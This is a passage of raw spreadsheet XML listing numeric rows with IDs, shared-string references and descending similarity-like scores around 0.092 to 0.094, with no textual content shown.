    </row>
    <row r="33379" ht="15.75" customHeight="1">
      <c r="A33379" s="1">
        <v>18977.0</v>
      </c>
      <c r="B33379" s="2">
        <v>5.4378432E7</v>
      </c>
      <c r="C33379" s="2" t="s">
        <v>32129</v>
      </c>
      <c r="D33379" s="2">
        <v>1.0</v>
      </c>
      <c r="E33379" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33379" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33380" ht="15.75" customHeight="1">
      <c r="A33380" s="1">
        <v>19164.0</v>
      </c>
      <c r="B33380" s="2">
        <v>5.4925717E7</v>
      </c>
      <c r="C33380" s="2" t="s">
        <v>32130</v>
      </c>
      <c r="D33380" s="2">
        <v>1.0</v>
      </c>
      <c r="E33380" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33380" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33381" ht="15.75" customHeight="1">
      <c r="A33381" s="1">
        <v>19318.0</v>
      </c>
      <c r="B33381" s="2">
        <v>5.529242E7</v>
      </c>
      <c r="C33381" s="2" t="s">
        <v>32131</v>
      </c>
      <c r="D33381" s="2">
        <v>1.0</v>
      </c>
      <c r="E33381" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33381" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33382" ht="15.75" customHeight="1">
      <c r="A33382" s="1">
        <v>20691.0</v>
      </c>
      <c r="B33382" s="2">
        <v>1.4519978E7</v>
      </c>
      <c r="C33382" s="2" t="s">
        <v>32132</v>
      </c>
      <c r="D33382" s="2">
        <v>1.0</v>
      </c>
      <c r="E33382" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33382" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33383" ht="15.75" customHeight="1">
      <c r="A33383" s="1">
        <v>21012.0</v>
      </c>
      <c r="B33383" s="2">
        <v>1.7312041E7</v>
      </c>
      <c r="C33383" s="2" t="s">
        <v>32133</v>
      </c>
      <c r="D33383" s="2">
        <v>1.0</v>
      </c>
      <c r="E33383" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33383" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33384" ht="15.75" customHeight="1">
      <c r="A33384" s="1">
        <v>25636.0</v>
      </c>
      <c r="B33384" s="2">
        <v>1.4478021E7</v>
      </c>
      <c r="C33384" s="2" t="s">
        <v>32134</v>
      </c>
      <c r="D33384" s="2">
        <v>1.0</v>
      </c>
      <c r="E33384" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33384" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33385" ht="15.75" customHeight="1">
      <c r="A33385" s="1">
        <v>25648.0</v>
      </c>
      <c r="B33385" s="2">
        <v>1.4519977E7</v>
      </c>
      <c r="C33385" s="2" t="s">
        <v>32132</v>
      </c>
      <c r="D33385" s="2">
        <v>1.0</v>
      </c>
      <c r="E33385" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33385" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33386" ht="15.75" customHeight="1">
      <c r="A33386" s="1">
        <v>25746.0</v>
      </c>
      <c r="B33386" s="2">
        <v>1.4600289E7</v>
      </c>
      <c r="C33386" s="2" t="s">
        <v>32135</v>
      </c>
      <c r="D33386" s="2">
        <v>1.0</v>
      </c>
      <c r="E33386" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33386" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33387" ht="15.75" customHeight="1">
      <c r="A33387" s="1">
        <v>25976.0</v>
      </c>
      <c r="B33387" s="2">
        <v>1.5292334E7</v>
      </c>
      <c r="C33387" s="2" t="s">
        <v>32136</v>
      </c>
      <c r="D33387" s="2">
        <v>1.0</v>
      </c>
      <c r="E33387" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33387" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33388" ht="15.75" customHeight="1">
      <c r="A33388" s="1">
        <v>26071.0</v>
      </c>
      <c r="B33388" s="2">
        <v>1.5596443E7</v>
      </c>
      <c r="C33388" s="2" t="s">
        <v>32137</v>
      </c>
      <c r="D33388" s="2">
        <v>1.0</v>
      </c>
      <c r="E33388" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33388" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33389" ht="15.75" customHeight="1">
      <c r="A33389" s="1">
        <v>26453.0</v>
      </c>
      <c r="B33389" s="2">
        <v>1.731204E7</v>
      </c>
      <c r="C33389" s="2" t="s">
        <v>32133</v>
      </c>
      <c r="D33389" s="2">
        <v>1.0</v>
      </c>
      <c r="E33389" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33389" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33390" ht="15.75" customHeight="1">
      <c r="A33390" s="1">
        <v>26708.0</v>
      </c>
      <c r="B33390" s="2">
        <v>1.8188818E7</v>
      </c>
      <c r="C33390" s="2" t="s">
        <v>32138</v>
      </c>
      <c r="D33390" s="2">
        <v>1.0</v>
      </c>
      <c r="E33390" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33390" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33391" ht="15.75" customHeight="1">
      <c r="A33391" s="1">
        <v>27840.0</v>
      </c>
      <c r="B33391" s="2">
        <v>2.3421611E7</v>
      </c>
      <c r="C33391" s="2" t="s">
        <v>32139</v>
      </c>
      <c r="D33391" s="2">
        <v>1.0</v>
      </c>
      <c r="E33391" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33391" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33392" ht="15.75" customHeight="1">
      <c r="A33392" s="1">
        <v>31272.0</v>
      </c>
      <c r="B33392" s="2">
        <v>4944313.0</v>
      </c>
      <c r="C33392" s="2" t="s">
        <v>32140</v>
      </c>
      <c r="D33392" s="2">
        <v>1.0</v>
      </c>
      <c r="E33392" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33392" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33393" ht="15.75" customHeight="1">
      <c r="A33393" s="1">
        <v>33637.0</v>
      </c>
      <c r="B33393" s="2">
        <v>8364636.0</v>
      </c>
      <c r="C33393" s="2" t="s">
        <v>32141</v>
      </c>
      <c r="D33393" s="2">
        <v>1.0</v>
      </c>
      <c r="E33393" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33393" s="2">
        <v>0.09393939393939392</v>
      </c>
    </row>
    <row r="33394" ht="15.75" customHeight="1">
      <c r="A33394" s="1">
        <v>442.0</v>
      </c>
      <c r="B33394" s="2">
        <v>1.7065081E7</v>
      </c>
      <c r="C33394" s="2" t="s">
        <v>32142</v>
      </c>
      <c r="D33394" s="2">
        <v>1.0</v>
      </c>
      <c r="E33394" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33394" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="33395" ht="15.75" customHeight="1">
      <c r="A33395" s="1">
        <v>2305.0</v>
      </c>
      <c r="B33395" s="2">
        <v>3.2729502E7</v>
      </c>
      <c r="C33395" s="2" t="s">
        <v>32143</v>
      </c>
      <c r="D33395" s="2">
        <v>1.0</v>
      </c>
      <c r="E33395" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33395" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="33396" ht="15.75" customHeight="1">
      <c r="A33396" s="1">
        <v>3573.0</v>
      </c>
      <c r="B33396" s="2">
        <v>3.8960936E7</v>
      </c>
      <c r="C33396" s="2" t="s">
        <v>32144</v>
      </c>
      <c r="D33396" s="2">
        <v>1.0</v>
      </c>
      <c r="E33396" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33396" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="33397" ht="15.75" customHeight="1">
      <c r="A33397" s="1">
        <v>15603.0</v>
      </c>
      <c r="B33397" s="2">
        <v>4.3498838E7</v>
      </c>
      <c r="C33397" s="2" t="s">
        <v>32145</v>
      </c>
      <c r="D33397" s="2">
        <v>1.0</v>
      </c>
      <c r="E33397" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33397" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="33398" ht="15.75" customHeight="1">
      <c r="A33398" s="1">
        <v>17465.0</v>
      </c>
      <c r="B33398" s="2">
        <v>4.9878183E7</v>
      </c>
      <c r="C33398" s="2" t="s">
        <v>32146</v>
      </c>
      <c r="D33398" s="2">
        <v>1.0</v>
      </c>
      <c r="E33398" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33398" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="33399" ht="15.75" customHeight="1">
      <c r="A33399" s="1">
        <v>17901.0</v>
      </c>
      <c r="B33399" s="2">
        <v>5.1108539E7</v>
      </c>
      <c r="C33399" s="2" t="s">
        <v>32147</v>
      </c>
      <c r="D33399" s="2">
        <v>1.0</v>
      </c>
      <c r="E33399" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33399" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="33400" ht="15.75" customHeight="1">
      <c r="A33400" s="1">
        <v>21956.0</v>
      </c>
      <c r="B33400" s="2">
        <v>2.895198E7</v>
      </c>
      <c r="C33400" s="2" t="s">
        <v>2082</v>
      </c>
      <c r="D33400" s="2">
        <v>1.0</v>
      </c>
      <c r="E33400" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33400" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="33401" ht="15.75" customHeight="1">
      <c r="A33401" s="1">
        <v>6396.0</v>
      </c>
      <c r="B33401" s="2">
        <v>4.8462647E7</v>
      </c>
      <c r="C33401" s="2" t="s">
        <v>32148</v>
      </c>
      <c r="D33401" s="2">
        <v>1.0</v>
      </c>
      <c r="E33401" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33401" s="2">
        <v>0.09259259259259255</v>
      </c>
    </row>
    <row r="33402" ht="15.75" customHeight="1">
      <c r="A33402" s="1">
        <v>6189.0</v>
      </c>
      <c r="B33402" s="2">
        <v>4.791106E7</v>
      </c>
      <c r="C33402" s="2" t="s">
        <v>32149</v>
      </c>
      <c r="D33402" s="2">
        <v>1.0</v>
      </c>
      <c r="E33402" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33402" s="2">
        <v>0.09226190476190478</v>
      </c>
    </row>
    <row r="33403" ht="15.75" customHeight="1">
      <c r="A33403" s="1">
        <v>15682.0</v>
      </c>
      <c r="B33403" s="2">
        <v>4.3849718E7</v>
      </c>
      <c r="C33403" s="2" t="s">
        <v>32150</v>
      </c>
      <c r="D33403" s="2">
        <v>1.0</v>
      </c>
      <c r="E33403" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33403" s="2">
        <v>0.09226190476190478</v>
      </c>
    </row>
    <row r="33404" ht="15.75" customHeight="1">
      <c r="A33404" s="1">
        <v>16642.0</v>
      </c>
      <c r="B33404" s="2">
        <v>4.714879E7</v>
      </c>
      <c r="C33404" s="5" t="s">
        <v>32151</v>
      </c>
      <c r="D33404" s="2">
        <v>1.0</v>
      </c>
      <c r="E33404" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33404" s="2">
        <v>0.09226190476190478</v>
      </c>
    </row>
    <row r="33405" ht="15.75" customHeight="1">
      <c r="A33405" s="1">
        <v>19655.0</v>
      </c>
      <c r="B33405" s="2">
        <v>5.6346981E7</v>
      </c>
      <c r="C33405" s="2" t="s">
        <v>32152</v>
      </c>
      <c r="D33405" s="2">
        <v>1.0</v>
      </c>
      <c r="E33405" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33405" s="2">
        <v>0.09226190476190478</v>
      </c>
    </row>
    <row r="33406" ht="15.75" customHeight="1">
      <c r="A33406" s="1">
        <v>27325.0</v>
      </c>
      <c r="B33406" s="2">
        <v>2.1412736E7</v>
      </c>
      <c r="C33406" s="2" t="s">
        <v>32153</v>
      </c>
      <c r="D33406" s="2">
        <v>1.0</v>
      </c>
      <c r="E33406" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33406" s="2">
        <v>0.09226190476190478</v>
      </c>
    </row>
    <row r="33407" ht="15.75" customHeight="1">
      <c r="A33407" s="1">
        <v>356.0</v>
      </c>
      <c r="B33407" s="2">
        <v>1.6066414E7</v>
      </c>
      <c r="C33407" s="2" t="s">
        <v>32154</v>
      </c>
      <c r="D33407" s="2">
        <v>1.0</v>
      </c>
      <c r="E33407" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33407" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33408" ht="15.75" customHeight="1">
      <c r="A33408" s="1">
        <v>3478.0</v>
      </c>
      <c r="B33408" s="2">
        <v>3.8392689E7</v>
      </c>
      <c r="C33408" s="2" t="s">
        <v>32155</v>
      </c>
      <c r="D33408" s="2">
        <v>1.0</v>
      </c>
      <c r="E33408" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33408" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33409" ht="15.75" customHeight="1">
      <c r="A33409" s="1">
        <v>6383.0</v>
      </c>
      <c r="B33409" s="2">
        <v>4.8421326E7</v>
      </c>
      <c r="C33409" s="2" t="s">
        <v>32156</v>
      </c>
      <c r="D33409" s="2">
        <v>1.0</v>
      </c>
      <c r="E33409" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33409" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33410" ht="15.75" customHeight="1">
      <c r="A33410" s="1">
        <v>8671.0</v>
      </c>
      <c r="B33410" s="2">
        <v>5.4377684E7</v>
      </c>
      <c r="C33410" s="2" t="s">
        <v>32157</v>
      </c>
      <c r="D33410" s="2">
        <v>1.0</v>
      </c>
      <c r="E33410" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33410" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33411" ht="15.75" customHeight="1">
      <c r="A33411" s="1">
        <v>9394.0</v>
      </c>
      <c r="B33411" s="2">
        <v>5.5743421E7</v>
      </c>
      <c r="C33411" s="2" t="s">
        <v>32158</v>
      </c>
      <c r="D33411" s="2">
        <v>1.0</v>
      </c>
      <c r="E33411" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33411" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33412" ht="15.75" customHeight="1">
      <c r="A33412" s="1">
        <v>10918.0</v>
      </c>
      <c r="B33412" s="2">
        <v>1.673137E7</v>
      </c>
      <c r="C33412" s="2" t="s">
        <v>32159</v>
      </c>
      <c r="D33412" s="2">
        <v>1.0</v>
      </c>
      <c r="E33412" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33412" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33413" ht="15.75" customHeight="1">
      <c r="A33413" s="1">
        <v>11174.0</v>
      </c>
      <c r="B33413" s="2">
        <v>1.9692701E7</v>
      </c>
      <c r="C33413" s="2" t="s">
        <v>32160</v>
      </c>
      <c r="D33413" s="2">
        <v>1.0</v>
      </c>
      <c r="E33413" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33413" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33414" ht="15.75" customHeight="1">
      <c r="A33414" s="1">
        <v>14925.0</v>
      </c>
      <c r="B33414" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C33414" s="2" t="s">
        <v>32161</v>
      </c>
      <c r="D33414" s="2">
        <v>1.0</v>
      </c>
      <c r="E33414" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33414" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33415" ht="15.75" customHeight="1">
      <c r="A33415" s="1">
        <v>16235.0</v>
      </c>
      <c r="B33415" s="2">
        <v>4.5748525E7</v>
      </c>
      <c r="C33415" s="2" t="s">
        <v>32162</v>
      </c>
      <c r="D33415" s="2">
        <v>1.0</v>
      </c>
      <c r="E33415" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33415" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33416" ht="15.75" customHeight="1">
      <c r="A33416" s="1">
        <v>16658.0</v>
      </c>
      <c r="B33416" s="2">
        <v>4.7215925E7</v>
      </c>
      <c r="C33416" s="2" t="s">
        <v>32163</v>
      </c>
      <c r="D33416" s="2">
        <v>1.0</v>
      </c>
      <c r="E33416" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33416" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33417" ht="15.75" customHeight="1">
      <c r="A33417" s="1">
        <v>17847.0</v>
      </c>
      <c r="B33417" s="2">
        <v>5.095845E7</v>
      </c>
      <c r="C33417" s="2" t="s">
        <v>32164</v>
      </c>
      <c r="D33417" s="2">
        <v>1.0</v>
      </c>
      <c r="E33417" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33417" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33418" ht="15.75" customHeight="1">
      <c r="A33418" s="1">
        <v>23788.0</v>
      </c>
      <c r="B33418" s="2">
        <v>7702545.0</v>
      </c>
      <c r="C33418" s="2" t="s">
        <v>32165</v>
      </c>
      <c r="D33418" s="2">
        <v>1.0</v>
      </c>
      <c r="E33418" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33418" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33419" ht="15.75" customHeight="1">
      <c r="A33419" s="1">
        <v>24884.0</v>
      </c>
      <c r="B33419" s="2">
        <v>1.2241041E7</v>
      </c>
      <c r="C33419" s="2" t="s">
        <v>2340</v>
      </c>
      <c r="D33419" s="2">
        <v>1.0</v>
      </c>
      <c r="E33419" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33419" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33420" ht="15.75" customHeight="1">
      <c r="A33420" s="1">
        <v>26886.0</v>
      </c>
      <c r="B33420" s="2">
        <v>1.9207085E7</v>
      </c>
      <c r="C33420" s="2" t="s">
        <v>32166</v>
      </c>
      <c r="D33420" s="2">
        <v>1.0</v>
      </c>
      <c r="E33420" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33420" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33421" ht="15.75" customHeight="1">
      <c r="A33421" s="1">
        <v>29451.0</v>
      </c>
      <c r="B33421" s="2">
        <v>3.2242295E7</v>
      </c>
      <c r="C33421" s="2" t="s">
        <v>32167</v>
      </c>
      <c r="D33421" s="2">
        <v>1.0</v>
      </c>
      <c r="E33421" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33421" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33422" ht="15.75" customHeight="1">
      <c r="A33422" s="1">
        <v>33358.0</v>
      </c>
      <c r="B33422" s="2">
        <v>7624048.0</v>
      </c>
      <c r="C33422" s="2" t="s">
        <v>32168</v>
      </c>
      <c r="D33422" s="2">
        <v>1.0</v>
      </c>
      <c r="E33422" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33422" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33423" ht="15.75" customHeight="1">
      <c r="A33423" s="1">
        <v>34189.0</v>
      </c>
      <c r="B33423" s="2">
        <v>9958437.0</v>
      </c>
      <c r="C33423" s="2" t="s">
        <v>32169</v>
      </c>
      <c r="D33423" s="2">
        <v>1.0</v>
      </c>
      <c r="E33423" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33423" s="2">
        <v>0.09226190476190477</v>
      </c>
    </row>
    <row r="33424" ht="15.75" customHeight="1">
      <c r="A33424" s="1">
        <v>864.0</v>
      </c>
      <c r="B33424" s="2">
        <v>2.1810682E7</v>
      </c>
      <c r="C33424" s="2" t="s">
        <v>32170</v>
      </c>
      <c r="D33424" s="2">
        <v>1.0</v>
      </c>
      <c r="E33424" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33424" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33425" ht="15.75" customHeight="1">
      <c r="A33425" s="1">
        <v>925.0</v>
      </c>
      <c r="B33425" s="2">
        <v>2.2308213E7</v>
      </c>
      <c r="C33425" s="2" t="s">
        <v>32171</v>
      </c>
      <c r="D33425" s="2">
        <v>1.0</v>
      </c>
      <c r="E33425" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33425" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33426" ht="15.75" customHeight="1">
      <c r="A33426" s="1">
        <v>1054.0</v>
      </c>
      <c r="B33426" s="2">
        <v>2.34463E7</v>
      </c>
      <c r="C33426" s="2" t="s">
        <v>32172</v>
      </c>
      <c r="D33426" s="2">
        <v>1.0</v>
      </c>
      <c r="E33426" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33426" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33427" ht="15.75" customHeight="1">
      <c r="A33427" s="1">
        <v>1144.0</v>
      </c>
      <c r="B33427" s="2">
        <v>2.4289022E7</v>
      </c>
      <c r="C33427" s="2" t="s">
        <v>32173</v>
      </c>
      <c r="D33427" s="2">
        <v>1.0</v>
      </c>
      <c r="E33427" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33427" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33428" ht="15.75" customHeight="1">
      <c r="A33428" s="1">
        <v>1241.0</v>
      </c>
      <c r="B33428" s="2">
        <v>2.5096587E7</v>
      </c>
      <c r="C33428" s="2" t="s">
        <v>32174</v>
      </c>
      <c r="D33428" s="2">
        <v>1.0</v>
      </c>
      <c r="E33428" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33428" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33429" ht="15.75" customHeight="1">
      <c r="A33429" s="1">
        <v>1647.0</v>
      </c>
      <c r="B33429" s="2">
        <v>2.8043006E7</v>
      </c>
      <c r="C33429" s="2" t="s">
        <v>32175</v>
      </c>
      <c r="D33429" s="2">
        <v>1.0</v>
      </c>
      <c r="E33429" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33429" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33430" ht="15.75" customHeight="1">
      <c r="A33430" s="1">
        <v>1670.0</v>
      </c>
      <c r="B33430" s="2">
        <v>2.8259205E7</v>
      </c>
      <c r="C33430" s="2" t="s">
        <v>32176</v>
      </c>
      <c r="D33430" s="2">
        <v>1.0</v>
      </c>
      <c r="E33430" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33430" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33431" ht="15.75" customHeight="1">
      <c r="A33431" s="1">
        <v>2460.0</v>
      </c>
      <c r="B33431" s="2">
        <v>3.3753846E7</v>
      </c>
      <c r="C33431" s="2" t="s">
        <v>32177</v>
      </c>
      <c r="D33431" s="2">
        <v>1.0</v>
      </c>
      <c r="E33431" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33431" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33432" ht="15.75" customHeight="1">
      <c r="A33432" s="1">
        <v>5113.0</v>
      </c>
      <c r="B33432" s="2">
        <v>4.4541263E7</v>
      </c>
      <c r="C33432" s="2" t="s">
        <v>32178</v>
      </c>
      <c r="D33432" s="2">
        <v>1.0</v>
      </c>
      <c r="E33432" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33432" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33433" ht="15.75" customHeight="1">
      <c r="A33433" s="1">
        <v>6851.0</v>
      </c>
      <c r="B33433" s="2">
        <v>4.9642181E7</v>
      </c>
      <c r="C33433" s="2" t="s">
        <v>32179</v>
      </c>
      <c r="D33433" s="2">
        <v>1.0</v>
      </c>
      <c r="E33433" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33433" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33434" ht="15.75" customHeight="1">
      <c r="A33434" s="1">
        <v>6925.0</v>
      </c>
      <c r="B33434" s="2">
        <v>4.9874904E7</v>
      </c>
      <c r="C33434" s="2" t="s">
        <v>32180</v>
      </c>
      <c r="D33434" s="2">
        <v>1.0</v>
      </c>
      <c r="E33434" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33434" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33435" ht="15.75" customHeight="1">
      <c r="A33435" s="1">
        <v>7211.0</v>
      </c>
      <c r="B33435" s="2">
        <v>5.0624709E7</v>
      </c>
      <c r="C33435" s="2" t="s">
        <v>32181</v>
      </c>
      <c r="D33435" s="2">
        <v>1.0</v>
      </c>
      <c r="E33435" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33435" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33436" ht="15.75" customHeight="1">
      <c r="A33436" s="1">
        <v>10726.0</v>
      </c>
      <c r="B33436" s="2">
        <v>1.5178415E7</v>
      </c>
      <c r="C33436" s="2" t="s">
        <v>32182</v>
      </c>
      <c r="D33436" s="2">
        <v>1.0</v>
      </c>
      <c r="E33436" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33436" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33437" ht="15.75" customHeight="1">
      <c r="A33437" s="1">
        <v>11663.0</v>
      </c>
      <c r="B33437" s="2">
        <v>2.3343054E7</v>
      </c>
      <c r="C33437" s="2" t="s">
        <v>32183</v>
      </c>
      <c r="D33437" s="2">
        <v>1.0</v>
      </c>
      <c r="E33437" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33437" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33438" ht="15.75" customHeight="1">
      <c r="A33438" s="1">
        <v>11792.0</v>
      </c>
      <c r="B33438" s="2">
        <v>2.4363401E7</v>
      </c>
      <c r="C33438" s="2" t="s">
        <v>32184</v>
      </c>
      <c r="D33438" s="2">
        <v>1.0</v>
      </c>
      <c r="E33438" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33438" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33439" ht="15.75" customHeight="1">
      <c r="A33439" s="1">
        <v>12154.0</v>
      </c>
      <c r="B33439" s="2">
        <v>2.7303417E7</v>
      </c>
      <c r="C33439" s="2" t="s">
        <v>31681</v>
      </c>
      <c r="D33439" s="2">
        <v>1.0</v>
      </c>
      <c r="E33439" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33439" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33440" ht="15.75" customHeight="1">
      <c r="A33440" s="1">
        <v>12792.0</v>
      </c>
      <c r="B33440" s="2">
        <v>3.1391453E7</v>
      </c>
      <c r="C33440" s="2" t="s">
        <v>32185</v>
      </c>
      <c r="D33440" s="2">
        <v>1.0</v>
      </c>
      <c r="E33440" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33440" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33441" ht="15.75" customHeight="1">
      <c r="A33441" s="1">
        <v>13106.0</v>
      </c>
      <c r="B33441" s="2">
        <v>3.3532359E7</v>
      </c>
      <c r="C33441" s="2" t="s">
        <v>32186</v>
      </c>
      <c r="D33441" s="2">
        <v>1.0</v>
      </c>
      <c r="E33441" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33441" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33442" ht="15.75" customHeight="1">
      <c r="A33442" s="1">
        <v>13246.0</v>
      </c>
      <c r="B33442" s="2">
        <v>3.4265174E7</v>
      </c>
      <c r="C33442" s="2" t="s">
        <v>32187</v>
      </c>
      <c r="D33442" s="2">
        <v>1.0</v>
      </c>
      <c r="E33442" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33442" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33443" ht="15.75" customHeight="1">
      <c r="A33443" s="1">
        <v>13537.0</v>
      </c>
      <c r="B33443" s="2">
        <v>3.5600933E7</v>
      </c>
      <c r="C33443" s="2" t="s">
        <v>32188</v>
      </c>
      <c r="D33443" s="2">
        <v>1.0</v>
      </c>
      <c r="E33443" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33443" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33444" ht="15.75" customHeight="1">
      <c r="A33444" s="1">
        <v>13557.0</v>
      </c>
      <c r="B33444" s="2">
        <v>3.5659102E7</v>
      </c>
      <c r="C33444" s="2" t="s">
        <v>32189</v>
      </c>
      <c r="D33444" s="2">
        <v>1.0</v>
      </c>
      <c r="E33444" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33444" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
    <row r="33445" ht="15.75" customHeight="1">
      <c r="A33445" s="1">
        <v>20778.0</v>
      </c>
      <c r="B33445" s="2">
        <v>1.5025161E7</v>
      </c>
      <c r="C33445" s="2" t="s">
        <v>32190</v>
      </c>
      <c r="D33445" s="2">
        <v>1.0</v>
      </c>
      <c r="E33445" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33445" s="2">
        <v>0.09226190476190475</v>
      </c>
    </row>
